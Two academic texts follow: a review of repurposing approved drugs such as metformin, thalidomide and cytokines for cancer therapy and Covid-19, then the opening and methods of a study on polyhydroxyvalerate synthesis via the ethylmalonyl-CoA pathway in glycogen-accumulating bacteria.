Repurposing, per se, is an old concept in oncology. Indeed, the first chemotherapy drugs might be regarded as repurposed chemical weapons, arising as they did from research on the 'mustard gas' (which has no relation to mustard and is liquid at room temperature) that caused so many deaths and chronic illness in the wars of the 20th century. While treating survivors of these attacks, doctors realized that the toxins, in addition to their vesicant (i.e. blister-inducing) activity, might have antitumor potential. In the medical equivalent of beating guns into plowshares, in this case converting a toxic compound to a therapeutic one, chemists and doctors worked together in a decade-long search for compounds with lower toxicity and enhanced cytostatic activity, with the hope of finding treatments to prolong the lives of their cancer patients. 2 After many explorations of conjugates with different biological molecules, two alkylating agents, chlorambucil (Leukeran) and busulfan (Myleran) (Fig. 1), were developed to treat chronic lymphocytic and myeloid leukemias (CLL and CML). Despite the advent of many other chemotherapies, these simple drugs continue to be used to this day.
This review will discuss two basic meanings of repurposing in cancer therapy. The first is adapting drugs used in other areas, for example antiinfectives or treatments for chronic diseases, for their observed cytostatic activity. 3 A second meaning is using drugs that were designed primarily to treat other illnesses to enhance the effects of chemotherapy or manage side effects. Examples of these two areas are shown below. Section 'Repurposing cancer therapies as antivirals and specifically anti-Covid-19 treatments' introduces the recent testing of cancer medications for treating Covid-19 infections and Fig. 1 Alkylating agents used for treating leukemias, chlorambucil (left) and bufulfone (myleran, right) were patterned after toxic nitrogen mustard gas (center) during many design iterations. 3D chemical structures are from Pubchem; atom colors are: carbon, gray; hydrogens, small white; nitrogen, blue; sulfur, yellow; chloride, green; oxygen, red.
how this may have future benefit for repurposing in oncology.
Adapting common drugs with cytostatic potential for cancer therapy
The great dream of the many waves of drug design in cancer is to achieve a drug that will only kill cancer cells, leaving most normal cells untouched. No chemotherapy has ever achieved this lofty goal. Unlike the careful design of, for example, drugs targeting phosphorylation cascades 4,5 and orally available TKIs, 6 there is no clear cellular target for most early therapies. Chemotherapy infusions cannot be typically done at home, as there is risk of anaphylaxis and many are so toxic that accidental extravasation 7 can lead to difficult to treat blisters. Directing treatments to specific organs often leads to the escape of a few wayward bandits, abnormal cells that will eventually find their way into another tissue and reinitiate tumorigenesis. Oncologists are thus always on the lookout for drugs with fewer side effects that can be used to treat cancer as a chronic disease or even prevent it. 8,9 Drugs designed to treat many different indications have been introduced into cancer therapy 10 and hundreds more have been reported to inhibit the growth of tumor cells in culture (see https://depmap.org/repurposing for the growth inhibitory activity of approved drugs against 578 human cancer cell lines. 11 ).
One area for repurposing is to replace current therapies with others that are cytostatic, rather than cytotoxic. Two repurposed drugs that have recently shown the most success are metformin, used since 1995 in the USA for diabetes, and thalidomide and its derivatives, which were developed to treat diseases such as psoriasis and inflammation related to infections.
Metformin as a cytostatic agent
Metformin (Fig. 2) traces its roots to a plant extract whose primary ingredient was guanidine, used throughout the Middle ages to treat diabetes symptoms. 12 Metformin was first synthesized in 1922, but due to the advent of insulin, only advanced as 'Glucophage' 30 years later when it was approved in France. It has become the first-line treatment for type 2 diabetes. Pertinent to this review, metformin is playing an increasing role as a cytostatic cancer treatment, thanks to its low toxicity (its primary adverse event (AE) is the rarely occurring lactic acidosis.) The first cancer trials arose from reports that diabetics taking metformin daily had lower rates of breast 13 and other cancers, augmented by studies showing cells from metformin-treated diabetics do not grow well in culture. 14 The cytostatic effects reported led to introducing metformin as an adjunct therapy for different types of cancers, some of which have reported remarkable success. In a recent phase II trial, 139 lung adenocarcinoma patients, whose tumors contained driver epidermal growth factor receptor (EGFR) mutations, were treated with TKIs (erlotinib hydrochloride, afatinib dimaleate or Gefitinib at standard dosage) plus or minus 500 mg/day of metformin (i.e. well within the normal dosage for treating diabetes). Adding metformin increased the progression-free survival (PFS) by about a third; it nearly doubled overall survival (OS). 15 Metformin also improved PFS and OS in advanced, previously untreated non-small cell lung cancer (NSCLC) when used in combination with platinum-based chemotherapy with or without the anti-VEGF inhibiting antibody, bevacizumab (Avastin) in two phase II studies. These included 33 non-diabetic patients of whom 70% had some history of smoking, with KRAS, EGFR and LKB1 mutation prevalence of 48, 26 and 8.3%, respectively. The PFS and OS for metformin-treated patients were especially improved in those with KRAS mutations. This suggests that determining molecular subgroups should be used to guide therapy in the future, especially in light of the paucity of direct KRAS inhibitors. 16 As exciting as these results are, metformin does not always improve survival. 17 The effects seen in the various clinical trials, many of which are ongoing, are patient specific. Several metabolic pathways altered by metformin treatment may account for the heterogeneity in response. It might be logical to assume that the overall effect of metformin, by lower circulating glucose concentration, would specifically starve tumor cells (which have an enhanced metabolic need for glucose), leading to decreased proliferation and metastasis. Various other explanations have been given for its observed effects in diabetes and in preventing cell growth, 18 whereby the inability of metformin to enter many cells has not always been accounted for in studies of its effects on metabolism. 19 One is that metformin can metabolically reprogram cancer cells by activating 5 AMP-activated kinase (AMPK), by increasing the ratio of AMP to ATP to some extent in cells (whereby the ratio was much higher after Rosiglitazone treatment). Other studies attributed the lower rates of breast cancer to metformin's role in controlling fatty acid oxidation. 20 Identifying the patients most likely to be helped relies on accurately identifying the cells most affected by metformin and determining if those types predominate in the patient tumors. A study of normal murine mammary cells indicated that metformin had the highest effect on hormone receptor positive luminal cells, where it decreased the total cell number, progenitor capacity and DNA damage. The authors suggest that identifying this type of cells in humans would indicate those most likely to benefit from metformin treatment. 21 To shed further light on this question, whole transcriptome RNA sequencing 22 of 40 breast cancer patients before and after 13-21 days of dose escalating metformin (from 500 mg/day to 1500 by day 6, which is still within the dose range for diabetes treatment) revealed that patients' profiles correlated with an optimal antiproliferative response. One commonality was that metformin treatment increased glucose flux in the tumor (as measured by 18-fluorodeoxy glucose uptake via PET-CT) as well as in other tissues.
Thalidomide and derivatives in cancer therapy
Thalidomide derivatives have a variety of uses in modern cancer therapy. Indeed, someone who awoke suddenly from a 60-year sleep would be amazed that this notorious drug would be in such widespread use today. The clinical tragedy associated with its first introduction remains a cautionary tale for all involved in drug research. 23 Thalidomide was first developed to treat morning sickness and sold over the counter to pregnant women in Germany in the 1950s, with recommended doses in the range of aspirin treatments (300-500 mg). The drug's side effects, including peripheral neuropathy, stopped its approval in the USA. However, thalidomide was only withdrawn worldwide in 1962 after it was linked to severe birth defects. As discussed elsewhere, 23 even after this withdrawal, thalidomide remained in clinical use for treating Hansen disease (leprosy). The major use of thalidomide and its derivatives for many years was immunomodulatory. There are now a variety of thalidomide-related compounds to choose from that have been designed to specifically control different pathways in immune cells. The relatively low cost of treatment for this family of drugs means it can play a role in many cancer therapies, both for its tumor growth inhibition and its anti-inflammatory activities.
The earliest introduction of thalidomide derivatives to cancer therapy was to control inflammation. Eventually, their ability to prevent the growth of certain cancer cells was recognized. Thalidomide and its more potent structural relatives, lenalidomide and pomalidomide, 23 are used to treat multiple myeloma, 24 mantle cell lymphoma, and myelodysplastic syndromes associated with the deletion 5q abnormality. On the other hand, apremilast (Otezla) was specifically designed to inhibit PDE4 25,26 and is now used to control psoriasis, lupus erythematosus and rheumatoid arthritis. 27 PDE4 is a phosphatase that degrades cAMP, a small molecule that can modulate inflammatory responses. Targeted PDE4 inhibitors are in preclinical trials for cancer. 28 ,29 At this point, the mechanistic basis for using the thalidomide drug family in cancer becomes confusing, as they have pleiomorphic effects. For example, their anti-inflammatory activity has been linked to their ability to inhibit secretion of tumor necrosis factor (TNF)-α and other cytokines. 30,31 Anti-TNF antibodies such as Humira have revolutionized the treatment of psoriasis and rheumatoid arthritis; however, inhibiting TNF may enhance inflammatory central nervous system syndromes such as multiple sclerosis. 32 A recent discovery suggests another reason for thalidomide-related compounds' action in cancer cells: their ability to bind cereblon, 33 a protein involved in limb outgrowth. The devastating teratogenic effects of thalidomide when taken in early pregnancy have also been linked to this binding. Even more intriguing are current attempts to manipulate thalidomide's binding to cereblon to induce specific protein degradation in cancer cells. 34 Early results indicated that thalidomide induced specific degradation of repressors in T-cells that can lead to activation and increased IL-2 secretion, thus providing another way to stimulate the immune system to fight cancer cells. 35
Cytokine-based therapies
There are repeated trials of cytokines as co-therapies. The earliest of the cytokines to enter cancer trials were recombinant interferons (IFN), introduced in the 1980s. 36 -39 The IFNs were identified for their antiviral activity; their first use in cancer was for the control of leukemias. They have also been tested for a variety of blood and solid cancers. IFN-α was used for many years to treat hairy cell leukemia, 40 CML and myelofibrosis 41 ; it may still be resorted to alone or as adjunct therapy for CML patients resistant to multiple TKIs. 1 A recent paper reported deep molecular remission in four of nine CML patients treated with Imatinib plus Ropeginterferon-α2b, with few AE. 42 IFNs have also been suggested to enhance treatment with temozolomide by inhibiting the MGMT repair enzyme. 43 However, chromosome instability in AML has been shown to directly upregulate IFNstimulated genes, 44 suggesting that IFN itself will not be helpful in treatment. The cost, need for injection or infusion, and side effects of IFNs suggest they could be replaced with small molecule, intracellular inducers, such as STING activators, 45,46 which may also require injection, or with compounds that may activate select steps in the IFN-induced pathways.
Other cytokines 39,47 have been tried repeatedly as co-treatments. Two of these proteins, TNF 48 and IL-2, were highly anticipated as potential anticancer therapies. Early tests showed some successes, but their toxic effects thwarted widespread clinical use. As with IFNs, there are continuing attempts to repurpose IL-2 in cancer therapy, [49][50][51][52] as an additive to immunotherapy, or for treating patients who have failed to respond to immunotherapy. 53 More study on how to control the AEs in IL-2 treatments 54,55 may lead to safer ways to use this molecule in cancer.
TNF is also problematic as a cancer treatment. Direct clinical use of TNF has been limited by side effects, such as cachexia and fever. TNF has been implicated in the origin of many different types of tumors, possibly precluding it use as a treatment. 56 Furthermore, TNF levels in the body rise with age, 57,58 along with increased incidence of cancer. TNF levels should certainly be checked in those who fail to respond to immune therapies.
However, things may turn around for this protein; a recent paper using mouse models suggests that the TLR-5 antagonist entolimod may control the toxic effects of TNF without affecting its antitumor activity. 59 If this proves true in human trials, this may unveil a new future use of TNF in cancer therapy.
Other drugs in testing
Other agents designed to treat a variety of different diseases are in testing against cancers. Statins have been tested as anticancer agents, as they can inhibit the activity of many GTPase oncogenes. While statins have not performed well as cancer drugs, 60 disulfiram (Antabuse), developed to treat alcoholism, is in testing with copper to treat metastatic breast cancer (NCT03323346). Nelfinivir, an AKT inhibitor developed to treat HIV, is in phase I trials for treating solid tumors, 61 (NCT01445106).
Gamma-secretase inhibitors, developed to treat Alzheimer disease (AD), are in multiple tests as anticancer drugs (alone [NCT01981551, NCT03785964, NCT03691207] or in combination with Car-T therapy [NCT 03502577]) as they also inhibit Notch 1 and signal peptidases. 62 And in turn, the cancer drug saracatinib (AZD-0530), designed to inhibit the SRC and BCR-ABL kinases, is now being tested for its effects on AD, 63 based on its inhibition of the Fyn Kinase, which may contribute to synaptotoxicity.
Repurposing drugs to control the effects of or enhance chemotherapy
Oncologists are also combining chemotherapeutics with compounds to control their effects on normal cells or improve their overall activity. Many FDA-approved chemotherapy drugs have severe side effects, ranging from blistering at the site of infusion to hair and teeth loss. While cooling the scalp or chewing ice during the infusion can partially control these side effects, 64 additional anti-inflammatory compounds are being sought. The orally available inhibitors of poly (ADP-ribose) polymerase (PARP) and kinases are easy to administer, but they may induce side effects such as nausea, 65,66 which may require co-treatment with antiemetics. However, use of proton pump inhibitors, used to control GERD symptoms in as many as 30% of cancer patients, has been shown to limit the effect of chemotherapy and worsen OS. 67 Especially patients with cardiac problems may benefit from co-treatment during chemotherapy with drugs such as β-blockers and aspirin. 68,69 Lowdose aspirin has long been recommended both to control inflammation and inhibit coagulation and was previously recommended to control stroke and heart attack incidence. However, ASPREE, a 4.7-year placebo controlled trial of >19 000 individuals older than 65-70 determined there was no advantage of taking aspirin. The risk of being diagnosed with stage 3 or 4 cancers and increased mortality was higher in the aspirin-treated patients than in the placebo group. 70 The usefulness of β-blockers to control tumor growth especially has been explored as propranolol decreased proliferation, migration and invasion of triple negative breast cancer cells in vitro. 71 Topical treatment with the β-blockers propranolol and timolol is a validated treatment for complicated infantile hemangiomas. 72,73 There are also many studies indicating that β-blockers can control the growth of vascular sarcomas and other endothelial cell tumors. 74 Their use in other cancers has shown less benefit. Multiple retrospective studies of patients treated with combination therapies including β-blockers have shown little indication of overall efficacy in ovarian cancer, 75 lung cancer 76 or in preventing cancer recurrence. 77 However, β-blocker co-treatment with anthracyclines can significantly reduce chemotherapy cardiotoxicity and preserve left ventricle function. 78,79 Furthermore, topical treatments with propranolol and timolol, such as those developed for infantile hemangiomas, can also shorten the recovery time when applied to painful swelling around the nails that can develop after treatment with EGFR inhibitors. 80 Another repurposed drug, dexrazoxane, may be superior for this use. Originally developed as an antimitotic, dexrazoxane, the (+)-enantiomorph of razoxane, has now been approved by the FDA for repurposing as a cotreatment to prevent anthracycline-induced extravasation injuries 81 and cardiomyopathy. Dexrazone's effect may be due to its ability to inhibit the formation of a toxic iron-anthracycline complex. 82 A recent multicenter study 83 of over 1000 AML patients treated with daunorubicin or mitoxantrone showed that cotreatment with dexrazone significantly lowered cardiac problems and also reduced treatment-related mortality. Dexrazone cotreatment is also used for immunosuppressive purposes.
The blood pressure medication, Mibefradil, which slows the excretion of many common drugs, can be used short term to enhance the activity of several different cancer drugs. 84 However, this may be counterproductive as increases in a drug's plasma concentration can induce cytokine-release syndrome (also called 'cytokine storm'). Drugs that can prevent the release of several inflammatory cytokines are hence useful. Abivertinib 85 is a novel small molecule TKI targeting mutant forms of both EGFR and Bruton's tyrosine kinase (BTK). In addition to slowing cell growth, abivertinib binds irreversibly and prevents phosphorylation of the BTK receptor, thus inhibiting the release of pro-inflammatory cytokines, including IL-1β, IL-6 and TNF-α.
Leucovorin (folinic acid), developed to treat pernicious and megaloblastic anemias, 86 can control the side effects of methotrexate and chemotherapy drugs. Combinations of leucovorin with 5fluorouracil and either oxaliplatin or irinotecan (the FOLFOX or FOLFIRI regimens) are standard treatments for colorectal cancers. However, alternatives to oxaliplatin should be sought, as there are severe and long-term neurotoxic AEs associated with this combination. 87 Artemisinin (malaria treatment) derivatives may be an alternative to oxaliplatin, as they are cytotoxic against colon cancer cells lines at low concentrations when used in combination with leucovorin and 5-fluorouracil (FOLNSC combination). 88 Another problem arising in cancer is enhanced coagulation, leading to stroke and heart attacks, due to chemotherapy or disease progression. While aspirin can reduce coagulation, other compounds specifically designed to control clotting, such as apixaban (Eliquis), a factor Xa inhibitor developed to treat atrial fibrillation, 89 may be preferable as cancer progresses. Apixaban does not have the same effect on platelet interaction as warfarin and heparin and may thus be a safer alternative.
One problem with combining inhibitors is that treatment with a wide variety of cytotoxic agents enhances mutations and treatment resistance by inducing ER stress and the unfolded protein response (UPR). UPR-induced autophagy supports tumorigenesis and the development of resistance to treatment. 90,91 One way to handle the unfolded protein response to chemotherapy in general is to control the proteasome, which regulates protein expression by removing ubiquitylated proteins. Proteosome inhibitors such as ixazomib (Ninlaro ® ) can be combined with lenalidomide and dexamethasone for the treatment of patients with multiple myeloma who have received at least one prior therapy. Bortezomib (Velcade) is used in multiple myeloma and mantle cell lymphoma. Bortezomib caused a rapid and dramatic change in the levels of intracellular peptides that are produced by the proteasome, 92 due to the inhibitor's direct interaction with subunits of the proteasome. Bortezomib has been suggested as an alternative to vincristine (and to treat neuropathy associated with vincristine treatment) for pediatric ALL. 93 Of course, no drug is without AEs. A recent report 94 suggests that administration of the antihistamine, ketotifen, can control the ocular effects of bortezomib.
Repurposing cancer therapies as antivirals and specifically anti-Covid-19 treatments
There is a clear overlap between the needs of cancer and severe Covid-19 patients for drugs to control inflammation and coagulation. Thus, there has been a recent spate of papers on repurposing drugs, including chemotherapy agents, to treat Covid-19 (and before the current pandemic, Ebola virus). The reader will not be surprised that there are trials planned of metformin and thalidomide as possible adjuvant treatments (e.g. NCT04510194, NCT04273529). A recent review summarizes the plethora of ongoing clinical trials of anti-cancer drugs being tested. 95 Among these are many phase 1-3 trials of IFNs and Janus associated kinase (JAK) inhibitors, alone or in combination with antiviral drugs. The JAK inhibitor, baricitinib, has also been reported to be efficacious in treating There are also intriguing reports that those with mutations in IFN-related genes 97 or auto-antibodies against IFNs have a more severe disease course. 98 Covid-19, along with other βcoronaviruses, is known to interfere with the early immune response that is based on IFN and the genes it stimulates.
However, while early treatment with IFN (types I and III) may have benefit, later in the disease course, it can cause damage to the lung epithelia that can lead to superinfections. 99 This is because IFNs can also play a role in cytokine release syndrome or 'cytokine storm', which may be responsible for mortality associated with Covid-19. Other tests are ongoing to determine whether inhibition of specific inflammatory cytokines is beneficial. A recent report found high levels of TNF in T-cells from Covid-19 patients with a fatal outcome and suggested the cytokine may have inhibited the immune response to the virus. 100 As this increase may inhibit normal humoral responses, 100 it is possible that TNF inhibitors, such as those developed for psoriasis, might be beneficial in treatment.
There are also many ongoing clinical trials for tocilizumab and other inhibitors of interleukin-6, a cytokine associated with inflammation. These IL-6 inhibitors were previously approved to treat multiple myeloma, lymphoproliferative disorders and Castleman's syndrome. Abivertinib, a cancer therapy TKI, is in phase 2 clinical trials for repurposing to prevent cytokine storm in Covid-19 patients (NCT04440007).
While these trials are dedicated to finding better treatments for Covid-19 in this hour of emergency, it is clear that the results can have impact on the future course of cancer therapy. There are particular ramifications for how to control the inflammatory AEs of immune therapy, which often limit its usefulness in treating fragile patients who have endured many types of chemotherapy. Companies should be conscious of the advantages of combining repurposed compounds with novel therapies, during their clinical trials. Any additional costs will be more than paid for if the therapy is then more acceptable to patients.
A few words in parting
While the examples here show the positive side of repurposing, it should be noted that not all chemotherapy agents can be re-used for every cancer. Combining therapies does not always bring better results. For example, recent results of a breast cancer trial 101 indicate that adding the anthracycline Epirubicin (+5-fluoruracil and cyclophosphamide) to neoadjuvant chemotherapy (including trastuzumab and pertuzumab) had little effect on event-free survival but increased AE, including two women who developed acute leukemia. As chemotherapy may primarily act in breast cancer by inducing terminal menopause, adding it to treatments designed to reduce estrogen levels may be superfluous. A 1999 study of metastatic (stage IV) melanoma showed there was no survival advantage to combining dacarbazine with cisplatin, carmustine and tamoxifen compared to high-dose dacarbazine alone. Only 25% of the patients on either regimen survived more than a year. 102 Fortunately, new immunotherapy drugs, such as a combination of CTLA-4 and PD-1 inhibitors (ipilimumab and nivolumab), have revolutionized the outlook for patients with metastatic melanoma. A recent report showed 1-year survival exceeded 80%, with 4-year rates >50%. 103 A second caution is that while many FDAapproved compounds have been found to have antitumor cell activity in vitro in 'high-throughput' screening, moving them into human treatments is difficult. Not every new combination of drugs can be tested in a random control trial; the costs, not to mention the lack of suitable patients, would be prohibitive. Improving selection from 'shot in the dark' assays of whole cells requires better understanding of why a given drug is cytostatic, and skepticism is called for when effects in culture require unrealistically high concentrations. For example, emetine, better known as an active ingredient of Ipecac syrup used to induce vomiting, binds ribosomes 104 and has been reported to selectively kill AML cells. 105 Whether its side effects can be overcome sufficiently to justify testing as a cancer therapeutic is not currently clear.
Investigating the metabolic basis for a 'hit' can be time consuming and costly. Funding is often lacking for such trials, 106 especially for off-patent drugs.
In this respect, there should be more public and pharmaceutical coalition funding available for offlabel testing. Another major difficulty in repurposing compounds is the need to assemble a proper patient pool for a blinded control study. One must take into account that cancer patients, especially those who are older, have additional disease, or have survived many different treatments and accompanying AE, are fragile. For example, a paper reporting a complete response to Ipilumab therapy following treatment with BRAF/MEK inhibitors ended by reporting the patient's death from side effects of the therapy. 107 Many trials, even of new drugs, are abandoned because they do not meet their target patient pool within a reasonable time frame, or the company funding it changes direction. Dosages that may be well tolerated in trials conducted using healthy subjects or when used for treating the diseases, the drug was originally intended for may not be achievable in cancer patients. Combination therapies only complicate these problems. However, individual treatments with older drugs can lead to remarkable cures. 108 Still, the best approach for a patient who has no clear alternative therapy may be to recommend an ongoing trial. Another alternative, for patients with genetic markers that correlate with the anticipated activity of a test intervention, is the N-of-1 trial. 109 Here, the patient serves as his/her own control. The success of the therapy, or basis for continuation, can be based for example on blood levels of selected metabolites and proteins that should lead to reduced disease or tumor growth.
Conclusions
The examples included in this review and related references show that the pantheon of approved drugs is a rich source of solutions for many problems in oncology. Replacing cytotoxic with cytostatic drugs targeting specific cellular pathways promises to further enhance treatment while limiting AEs. Combinations with repurposed inhibitors designed to control inflammation can control the toxicity of chemotherapeutics or cytokines to normal cells and provide new treatments for resistant tumors.
The pace of research on repurposing compounds from all clinical areas is breathtaking and has contributed to increasing survival and easing the effects of chemotherapy on cancer patients. In the proper setting, established drugs can be smart therapies that can replace untargeted toxins relied upon in the past.
Data Availability Statement
No new data were generated or analyzed in support of this research.
Funding
This work was supported in part by grants from the National Institute of Allergy and Infectious Diseases, USA, R21 AI105985-01 (to CHS) and R01 AI137332-01. | 2021-02-03T06:19:20.478Z | 2021-02-01T00:00:00.000 | {
"year": 2021,
"sha1": "fd87595c463f3188e8ffac06cd98429356e581f7",
"oa_license": null,
"oa_url": "https://academic.oup.com/bmb/article-pdf/137/1/13/36684677/ldaa045.pdf",
"oa_status": "BRONZE",
"pdf_src": "PubMedCentral",
"pdf_hash": "e2b97c0bc5b96aad1d33e6b652b79be4d7b0747d",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
247712691 | pes2o/s2orc | v3-fos-license | Ethylmalonyl-CoA pathway involved in polyhydroxyvalerate synthesis in Candidatus Contendobacter
Here a stable glycogen accumulating organisms (GAOs) system was operated by anaerobic–aerobic mode in the sequencing batch reactor. We focused on the metabolic mechanisms of PHAs storage from GAOs. Our system showed the classic characteristic of glycogen accumulating metabolism (GAM). Glycogen consumption was followed by acetic acid uptake to synthesize poly-β-hydroxyalkanoates (PHAs) during the anaerobic period, and glycogen was synthesized by PHAs degradation in the aerobic stage. Microbial community structure indicated that Candidatus Contendobacter was the most prevalent GAOs. We found that the ethylmalonyl-CoA (EMC) pathway was the crucial pathway supplying the core substance propionyl-CoA for poly-β-hydroxyvalerate (PHV) synthesis in Candidatus Contendobacter. All genes in EMC pathway were mainly located in Candidatus Contendobacter by gene source analysis. The key genes expression of EMC pathway increased with Candidatus Contendobacter enrichment, further validating that propionyl-CoA was synthesized by Candidatus Contendobacter predominantly via EMC pathway. Our work revealed the novel mechanisms underlying PHV synthesis through EMC pathway and further improved the intercellular storage metabolism of GAOs.
Introduction
Enhanced Biological Phosphorus Removal (EBPR) is a widely used process for achieving phosphorus removal from wastewater. Phosphorus-accumulating organisms such as carbon-phosphorus ratio, substrate type, temperature and redox potential changes, can lead to inefficiencies and even the deterioration of EBPR system (Nittami et al. 2017;Tayà et al. 2013;Welles et al. 2016a;Zhang et al. 2008). The problems have often been attributed to glycogen accumulating organisms (GAOs), although this is yet to be convincingly shown in full-scale systems where the presence of GAOs does not always coincide with poor performance (Lopez-Vazquez et al. 2009;Weissbrodt et al. 2013;Winkler et al. 2011). GAOs raise growing concern about the adverse impacts of EBPR system. Similar to PAOs, GAOs consume their intracellular glycogen as the energy source for VFAs absorption and PHAs synthesis. In the following aerobic phage, GAOs consume PHAs to synthesize glycogen for the growth (Zhang et al. 2008). However, some studies have reported that GAOs exit in full-scale EBPR plants and not affect the phosphorus removal efficiency (Lanham et al. 2013;Nielsen et al. 2019). Therefore, the biological characteristics of GAOs need further explore.
The intracellular storage substances play a key role in regulating the metabolism of microbiology. PHAs including poly-β-hydroxybutyrate (PHB), polyβ-hydroxyvalerate (PHV) and poly-β-hydroxy-2methylvalerate (PH2MV) are the important intracellular carbon and energy sources for GAOs as well as PAOs. In comparison with PAOs, GAOs are more active in terms of PHA utilization and produce more diverse PHAs (PHB and PHV) with the same organic substrate (Bengtsson 2009;Zhang et al. 2019). In GAOs, PHAs synthesis is involved in the following pathway: Acetic acid is consumed to form acetyl-CoA, and propionyl-CoA is produced from pyruvate (an intermediate in glycolysis) through the succinate-propionate pathway. Finally, one molecule of acetyl-CoA and propionyl-CoA is polymerized to PHV under the action of polymerase, while two molecules of propionyl-CoA form 3-hydroxy-2-methylvalerate and then are polymerized to PH2MV. Many studies validated that GAOs produced propionyl-CoA mainly through the succinate-propionate pathway and then combines with acetyl-CoA to form PHV. However, based on the difference of bacterial species, propionyl-CoA can be produced via different routes, not just via the succinate-propionate pathway (Guedes da Silva et al. 2020;McIlroy et al. 2014;Schneider et al. 2012). Hence, the metabolisms of the intercellular storage substances in GAOs still remain unclear.
There may be significant differences in glycogen degradation, intercellular storage and VFA metabolism among different kinds of GAOs (McIlroy et al. 2014;Oehmen et al. 2006). For example, there were considerable differences between Candidatus Contendobacter denitrificans and Candidatus Competibacter odensis for the Embden-Meyerhof-Parnas and Entner-Doudoroff glycolytic pathways, Candida contedobacter cannot carry out glycolysis through Entner-Doudoroff pathway or denitrification (McIlroy et al. 2014). Many studies have reported that the denitrifying GAOs become one of the crucial functional microorganisms in full-scale EBPR plants with stable performance (Ji et al. 2017;Yuan et al. 2020). GAOs have also been used for the simultaneous removal of pollutants such as nitrogen and phosphorus under anaerobic-aerobic conditions (He et al. 2020). In addition, some studies investigated the feasibility of simultaneous partial nitrification, denitrification, and phosphorus removal in a singlestage anaerobic/microaerobic sequencing batch reactor (Yuan et al. 2020), suggesting that denitrifying GAOs and denitrifying PAOs played a major role in nitrogen and phosphorus removal, respectively. Therefore, the intercellular storage substances play a vital role in the metabolism of GAOs, such novel applications need further uncover mechanisms on the intercellular storage and the different functions.
In this study, we developed a stable GAO enrichment model-based anaerobic-aerobic sequencing batch reactor (SBR) system in which acetic acid was used as the sole carbon source and decanting after the anaerobic period. Metagenome and metatranscriptome were used to study the dynamic changes of microbial community. We focused on analyzing and identifying the various pathways and the key genes with the metabolisms of intercellular storage substances. Further, we investigated the key genes source to assess the core pathway of intercellular storage metabolism in GAOs. Our results would likely increase our ability to optimize, manipulate and extend the bioprocess of GAOs enrichment system.
Materials and methods
Reactor design and operation process SBR system was operated under anaerobic-aerobic conditions. The inoculated sludge came from the secondary sedimentation unit of Sewage Treatment Plant, Tianjin, China. The volume exchange rate was approximately about 70% after the anaerobic stage, and the cycle time was 6 h. Each cycle consisted of six stage including filling period (2 min), anaerobic phase (90 min), settling phase (15 min), withdrawing period (6 min), aerobic phase (240 min), idle period (9 min), the reactor operation flow is shown in a single cycle (Fig. 1). The SBR system was controlled using a programmable logic controller, input water was controlled by a liquid level meter and a submersible pump. Further, anaerobic mixing was achieved using an electric agitator, and aeration was controlled with a rotameter.
Culture media
In the system, we used synthetic wastewater, which included 400-440 mg HAc/L as the source of carbon, 40 mg/L NH 4 + -N (provided by NH 4 Cl) as the source of nitrogen, 5 mg/L PO 4 3 -P (provided by KH 2 PO 4 ) as the source of phosphorous. Other nutrient salts included 50 mg/L MgSO 4 ·7H 2 O, 20 mg/L KCl, 20 mg/L CaCl 2 , 0.1 mg/L FeSO 4 ·7H 2 O, 0.1 mg/L CuSO 4 ·5H 2 O, 0.1 mg/L MnSO 4 . According to the properties of the actual wastewater, pH was not controlled in this study.
Analytical methods of reactor performance
Acetic acid levels were assessed with high performance liquid chromatography using an ODS-2 HypersilTM column (Thermo Fisher Scientific, Waltham, MA, USA) and ultraviolet light detector (Qing 2017). PHAs (PHB and PHV) levels were assessed with gas chromatography (GC) (Oehmen et al. 2005). Weighed freeze-dried biomass and PHB/PHV standards were placed into the glass tubes and heated at 105 ℃ for 6 h after being mixed with 2 mL methanol acidified with 3% H 2 SO 4 and 2 mL chloroform. Benzoic acid was used as internal standard. After cooling, 1 mL Milli-Q water was added to the samples, followed by thorough mixing and incubation at − 20 ℃ for overnight to achieve phase separation. After centrifugation for 5 min at 6000 rpm, PHA levels in the chloroform phases (bottom layer) were measured. Glycogen levels were examined according to the previous method (Wang et al. 2006). Intracellular glycogen was extracted using NaOH and C 2 H 5 OH after extracellular polymer removal at 70 ℃, and then the anthrone method was used for glucose concentration measurement. Phosphate levels were measured using ammonium molybdate spectrophotometry. Mixed liquor suspended solids were assessed using gravimetric method.
Metagenomic sequencing
Samples were collected at the end of the anaerobic period on days 1, 20, 39, 52 and 75 of sludge inoculation at regular intervals for three consecutive cycles. 5 mL mud-water mixed samples were collected during each cycle period. DNA was extracted and purified. A total of 1 μg DNA per sample was used to generate sequencing libraries whose inserts size was about 350 bp. Library construction and sequencing were completed on the Illumina HiSeq platform (Novogene Bioinformatics Technology Co, Ltd., Beijing, China). The raw data obtained was processed using Readfq (V8, https:// github. com/ cjfie lds/ readfq) to acquire the clean data for subsequent analysis. Gene abundance evaluation and species annotation were eventually performed. The method details were described in the previous studies (Ai et al. 2019; McIlroy
Metatranscriptome sequencing
Sampling was performed as described above. Total RNA was extracted using TRIzol (Invitrogen, Waltham, MA, USA) and quality checked using 1% agarose gel electrophoresis and a Qubit 2.0 fluorometer (Invitrogen). RNA integrity and quantity were finally measured using RNA Nano 6000 Assay Kit of the Bioanalyzer 2100 system. RNA library for metatranscriptome-seq was prepared as rRNA depletion and stranded method. RNA was fragmented into 250 ~ 300 bp fragments and reverse transcribed into cDNA. Remaining overhangs of double-strand cDNA were converted into blunt ends via exonuclease/polymerase activities. After adenylation of 3' ends of DNA fragments, sequencing adaptors were ligated to the cDNA. In order to select cDNA fragments of preferentially 250 ~ 300 bp in length, the library fragments were purified with AMPure XP system. Amplification of cDNA was performed using PCR. Raw data generation, data filter and taxonomy annotation were the same as metagenomic sequencing. The metatranscriptome sequencing data have been submitted to NCBI Sequence Read Archive database under accession numbers PRJNA791813.
Data analysis for the microbial community and functional genes source
To annotate microbial community in the system, the sequences of bacteria were searched against NR database (Version: 2018-01-02, https:// www. ncbi. nlm. nih. gov/) of NCBI for microbial community identification using DIAMOND (Buchfink et al. 2015) blastp, with a cut-off e-value of 1e−5. As each sequence might aligned to multiple results, the result with the e-value ≤ the smallest e-value *10 was chosen to take the LCA (lowest common ancestor) algorithm to make sure the species annotation of sequences (Hanson et al. 2016).
